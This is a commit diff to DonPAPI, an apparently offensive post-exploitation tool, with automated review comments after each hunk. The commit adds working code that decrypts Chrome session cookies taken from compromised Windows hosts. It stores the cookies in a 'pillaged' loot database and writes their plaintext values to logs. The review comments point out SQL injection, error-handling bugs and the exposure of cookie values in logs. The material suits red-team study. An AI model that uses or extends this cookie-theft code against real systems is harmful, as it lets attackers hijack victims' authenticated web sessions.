Projects STRLCPY DonPAPI Commits 73034829
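--- a/database.py
+++ b/database.py
@@ -627,6 +627,19 @@
 FOREIGN KEY(pillaged_from_computerid) REFERENCES computers(id),
 FOREIGN KEY(pillaged_from_userid) REFERENCES users(id)
 )''')
+db_conn.execute('''CREATE TABLE "cookies" (
+"id" integer PRIMARY KEY,
+"file_path" text,
+"name" text,
+"value" text,
+"expires_utc" int,
+"target" text,
+"type" text,
+"pillaged_from_computerid" integer,
+"pillaged_from_userid" integer,
+FOREIGN KEY(pillaged_from_computerid) REFERENCES computers(id),
+FOREIGN KEY(pillaged_from_userid) REFERENCES users(id)
+)''')
 db_conn.execute('''CREATE TABLE "dpapi_hash" (
 "id" integer PRIMARY KEY,
 "file_path" text,
@@ -1024,6 +1037,8 @@
 return user_rowid
 
 def clear_input(self,data):
+if isinstance(data,int):
+return data
 if data is None:
 data = ''
 result = data.replace('\x00','')
@@ -1139,6 +1154,126 @@
 
 except Exception as ex:
 self.logging.error(f"Exception in add_credz 4")
+self.logging.debug(ex)
+
+return None
+
+def add_cookies(self, credz_type, credz_name, credz_value,credz_expires_utc, credz_target, credz_path , pillaged_from_computerid=None,pillaged_from_userid=None,pillaged_from_computer_ip=None,pillaged_from_username=None):
+"""
+Check if this credential has already been added to the database, if not add it in.
+"""
+user_rowid=None
+try:
+credz_name=self.clear_input(credz_name)
+self.logging.debug(f"{credz_name} - {binascii.hexlify(credz_name.encode('utf-8'))}")
+credz_value = self.clear_input(credz_value)
+self.logging.debug(f"{credz_value} - {binascii.hexlify(credz_value.encode('utf-8'))}")
+credz_expires_utc = self.clear_input(credz_expires_utc)
+self.logging.debug(f"{credz_expires_utc}")
+credz_target = self.clear_input(credz_target)
+self.logging.debug(f"{credz_target} - {binascii.hexlify(credz_target.encode('utf-8'))}")
+credz_path = self.clear_input(credz_path)
+self.logging.debug(f"{credz_path} - {binascii.hexlify(credz_path.encode('utf-8'))}")
+self.logging.debug(f"pillaged_from_computer_ip {pillaged_from_computer_ip} - {binascii.hexlify(pillaged_from_computer_ip.encode('utf-8'))}")
+self.logging.debug(f"pillaged_from_username {pillaged_from_username}")
+
+
+if pillaged_from_computer_ip != None:
+with self.conn:
+cur = self.conn.cursor()
+cur.execute(f"SELECT * FROM computers WHERE LOWER(ip)=LOWER('{pillaged_from_computer_ip}')")
+results = cur.fetchall()
+if len(results)>0:
+result=results[0]
+pillaged_from_computerid=result[0]
+self.logging.debug(f"[+] Resolved {pillaged_from_computer_ip} to id : {pillaged_from_computerid}")
+except Exception as ex:
+self.logging.error(f"Exception in add_cookie 1")
+self.logging.debug(ex)
+
+try:
+if pillaged_from_username != None:
+with self.conn:
+cur = self.conn.cursor()
+cur.execute(f"SELECT * FROM users WHERE LOWER(username)=LOWER('{pillaged_from_username}') AND pillaged_from_computerid={pillaged_from_computerid}")
+results = cur.fetchall()
+if len(results) > 0:
+result = results[0]
+pillaged_from_userid = result[0]
+self.logging.debug(f"[+] Resolved {pillaged_from_username} on machine {pillaged_from_computerid} to id : {pillaged_from_userid}")
+except Exception as ex:
+self.logging.error(f"Exception in add_cookies 2")
+self.logging.debug(ex)
+pass
+if pillaged_from_computerid == None or pillaged_from_userid == None :
+self.logging.debug(f"[-] Missing computerId or UserId to register Cookie {credz_name} {credz_value} - {credz_target}")
+#return None
+try:
+if pillaged_from_userid == None :
+query = "SELECT * FROM cookies WHERE LOWER(name)=LOWER(:credz_name) AND LOWER(value)=LOWER(:credz_value) AND expires_utc=:credz_expires_utc AND LOWER(type)=LOWER(:credz_type) AND LOWER(target)=LOWER(:credz_target) AND pillaged_from_computerid=:pillaged_from_computerid"
+parameters = {
+"credz_name": credz_name,
+"credz_value": credz_value,
+"credz_expires_utc": credz_expires_utc,
+"credz_type": credz_type, "credz_target": credz_target,
+"pillaged_from_computerid": int(pillaged_from_computerid),
+}
+else:
+query = "SELECT * FROM cookies WHERE LOWER(name)=LOWER(:credz_name) AND LOWER(value)=LOWER(:credz_value) AND expires_utc=:credz_expires_utc AND LOWER(type)=LOWER(:credz_type) AND LOWER(target)=LOWER(:credz_target) AND pillaged_from_computerid=:pillaged_from_computerid AND pillaged_from_userid=:pillaged_from_userid"
+parameters = {
+"credz_name": credz_name,
+"credz_value": credz_value,
+"credz_expires_utc": credz_expires_utc,
+"credz_type": credz_type, "credz_target": credz_target,
+"pillaged_from_computerid": int(pillaged_from_computerid),
+"pillaged_from_userid": int(pillaged_from_userid)
+}
+self.logging.debug(query)
+with self.conn:
+cur = self.conn.cursor()
+cur.execute(query, parameters)
+results = cur.fetchall()
+except Exception as ex:
+self.logging.error(f"Exception in add_cookie 3")
+self.logging.debug(ex)
+try:
+if not len(results):
+if pillaged_from_userid == None:
+query = "INSERT INTO cookies (name, value, expires_utc, target, type, pillaged_from_computerid, file_path) VALUES (:credz_name, :credz_value, :credz_expires_utc, :credz_target, :credz_type, :pillaged_from_computerid, :credz_path)"
+parameters = {
+"credz_name": credz_name,
+"credz_value": credz_value,
+"credz_expires_utc": credz_expires_utc,
+"credz_target": credz_target,
+"credz_type": credz_type,
+"pillaged_from_computerid": int(pillaged_from_computerid),
+"credz_path": credz_path,
+}
+else:
+query = "INSERT INTO cookies (name, value, expires_utc, target, type, pillaged_from_computerid,pillaged_from_userid, file_path) VALUES (:credz_name, :credz_value, :credz_expires_utc, :credz_target, :credz_type, :pillaged_from_computerid, :pillaged_from_userid, :credz_path)"
+parameters = {
+"credz_name": credz_name,
+"credz_value": credz_value,
+"credz_expires_utc": credz_expires_utc,
+"credz_type": credz_type,
+"credz_target": credz_target,
+"pillaged_from_computerid": int(pillaged_from_computerid),
+"pillaged_from_userid": int(pillaged_from_userid),
+"credz_path": credz_path,
+}
+self.logging.debug(query)
+with self.conn:
+cur = self.conn.cursor()
+cur.execute(query, parameters)
+user_rowid = cur.lastrowid
+self.logging.debug(
+f'added_cookies(credtype={credz_type}, target={credz_target}, name={credz_name}, value={credz_value}) => {user_rowid}')
+else:
+self.logging.debug(
+f'added_credential(credtype={credz_type}, target={credz_target}, name={credz_name}, value={credz_value}) => ALREADY IN DB')
+
+except Exception as ex:
+self.logging.error(f"Exception in add_cookie 4")
 self.logging.debug(ex)
 
 return None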
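Review bot: The two lookup queries at new lines 1184 and 1198 splice `pillaged_from_computer_ip` and `pillaged_from_username` into the SQL with an f-string, while every other statement in add_cookies binds named parameters; a username read off a pillaged host is untrusted input, and a single quote in it breaks or rewrites the query against the loot database. Bind them like the rest of the function: `cur.execute("SELECT * FROM computers WHERE LOWER(ip)=LOWER(:ip)", {"ip": pillaged_from_computer_ip})` and `cur.execute("SELECT * FROM users WHERE LOWER(username)=LOWER(:u) AND pillaged_from_computerid=:cid", {"u": pillaged_from_username, "cid": pillaged_from_computerid})`. Separately, when the block at 1211-1235 fails (for example `int(None)` at 1219 because no computer id was resolved, the early `return None` at 1210 being commented out), `results` is never assigned and `if not len(results)` at 1240 raises NameError, which the last handler reports as "Exception in add_cookie 4" instead of the real cause; initialising `results = []` next to `user_rowid=None`, or restoring the early return, makes the log truthful. The same f-string lookups presumably exist in add_credz, whose tail forms the context at the top of this hunk.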
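--- a/myseatbelt.py
+++ b/myseatbelt.py
@@ -458,17 +458,19 @@
 self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Exception decrypting logindata for CHROME {user.username} {localfile} {bcolors.ENDC}")
 self.logging.debug(ex)
 if my_blob_type == 'ChromeCookies':
-"""
-myChromeSecrets.cookie_path=localfile
-user.files[longname] = {}
-user.files[longname]['type'] = my_blob_type
-user.files[longname]['status'] = 'encrypted'
-user.files[longname]['path'] = localfile
-cookies=myChromeSecrets.decrypt_chrome_CookieData()
-user.files[longname]['secret'] = cookies
-if cookies is not None:
-user.files[longname]['status'] = 'decrypted'
-"""
+try:
+myChromeSecrets.cookie_path=localfile
+user.files[longname] = {}
+user.files[longname]['type'] = my_blob_type
+user.files[longname]['status'] = 'encrypted'
+user.files[longname]['path'] = localfile
+cookies=myChromeSecrets.decrypt_chrome_CookieData()
+user.files[longname]['secret'] = cookies
+if cookies is not None:
+user.files[longname]['status'] = 'decrypted'
+except Exception as ex:
+self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Exception decrypting CookieData for CHROME {user.username} {localfile} {bcolors.ENDC}")
+self.logging.debug(ex)
 
 except Exception as ex:
 self.logging.debug(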
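Review bot: If `decrypt_chrome_CookieData()` at new line 467 raises, the handler at 471 logs and carries on, but `user.files[longname]` is then left with 'status' = 'encrypted' and no 'secret' key at all, because the assignment at 468 never ran; anything that later reads `['secret']` on an encrypted entry gets a KeyError instead of None. Adding `user.files[longname]['secret'] = None` next to the other initialisers at 463-466 gives a failed entry the same shape as a successful one. The enclosing function starts and ends outside the hunk; the new handler mirrors the logindata branch above it, so the debug-level logging is at least consistent with the existing code.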
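--- a/software/browser/chrome_decrypt.py
+++ b/software/browser/chrome_decrypt.py
@@ -1,5 +1,6 @@
 import sys
 import sqlite3,os,json,base64,binascii
+from datetime import datetime,timedelta
 from lib.toolbox import bcolors
 from lib.dpapi import *
 
@@ -152,6 +153,8 @@
 #path = '192.168.20.141\\Users\\Administrateur.TOUF\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\'
 try:
 if self.cookie_path!=None:
+self.logging.debug(f"[{self.options.target_ip}] [+] Decrypting Chrome cookie in {self.cookie_path}")
+
 if os.path.isfile(self.cookie_path):
 connection = sqlite3.connect(self.cookie_path)
 with connection:
@@ -160,22 +163,31 @@
 'select host_key, "TRUE", path, "FALSE", expires_utc, name, encrypted_value from cookies')
 values = v.fetchall()
 
+self.logging.debug(f"[{self.options.target_ip}] [+] Found {len(values)} Chrome cookies")
 for host_key, _, path, _, expires_utc, name, encrypted_value in values:
-#self.logging.debug(f"[{self.options.target_ip}] [+] Found Chrome cookie for {host_key}, {path}, {name},{value},{len(value)}")
+self.logging.debug(f"[{self.options.target_ip}] [+] Found Chrome cookie for {host_key}, cookie name: {name}, expire at utc :{(datetime(1601, 1, 1) + timedelta(microseconds=expires_utc)).strftime('%b %d %Y %H:%M:%S')}")
 self.cookies[host_key]={}
 self.cookies[host_key][name]=self.decrypt_chrome_password(encrypted_value)
-self.logging.debug(f"[{self.options.target_ip}] [+] Found Chrome cookie for {host_key}, {path}, {name},{self.cookies[host_key][name]}")
+############PROCESSING DATA
+self.db.add_cookies(credz_type='browser-chrome',
+credz_name=name,
+credz_value=self.cookies[host_key][name],
+credz_expires_utc=expires_utc,
+credz_target=host_key,
+credz_path='',
+pillaged_from_computer_ip=self.options.target_ip,
+pillaged_from_username=self.username)
+self.logging.info(f"[{self.options.target_ip}] [+] {bcolors.OKGREEN}[Chrome Cookie] {bcolors.ENDC} for {host_key} {bcolors.OKBLUE}[ {name}:{self.cookies[host_key][name]} ] {bcolors.ENDC} expire time: {(datetime(1601, 1, 1) + timedelta(microseconds=expires_utc)).strftime('%b %d %Y %H:%M:%S')}")
 
 except sqlite3.OperationalError as e:
 e = str(e)
 if (e == 'database is locked'):
-print('[!] Make sure Google Chrome is not running in the background')
+self.logging.debug(f"[{self.options.target_ip}] [!] Make sure Google Chrome is not running in the background")
 elif (e == 'no such table: logins'):
-print('[!] Something wrong with the database name')
+self.logging.debug(f"[{self.options.target_ip}] [!] Something wrong with the database name")
 elif (e == 'unable to open database file'):
-print('[!] Something wrong with the database path')
-else:
-print(e)
+self.logging.debug(f"[{self.options.target_ip}] [!] Something wrong with the database path")
+self.logging.debug(f"[{self.options.target_ip}] {e}")
 return None
 
 return self.cookies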
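Review bot: The `add_cookies` call at new lines 172-179 passes `credz_path=''` even though the source database is known in `self.cookie_path` and the new cookies table has a file_path column for exactly that provenance; `credz_path=self.cookie_path,` keeps each stored cookie traceable to the file it came from. The expiry formatting is computed twice, at 168 and 180; hoisting it into one local before line 168, `expires_at = (datetime(1601, 1, 1) + timedelta(microseconds=expires_utc)).strftime('%b %d %Y %H:%M:%S')`, removes the duplicate and makes both messages agree by construction. Note also that the info-level line at 180 writes the decrypted cookie value into the run log, so any log retention or shipping now holds the plaintext session values in addition to the database; the debug line at 168 already reports host and name without the value, which is usually enough at info level. The method's header is outside the hunk; its body ends at `return self.cookies` here.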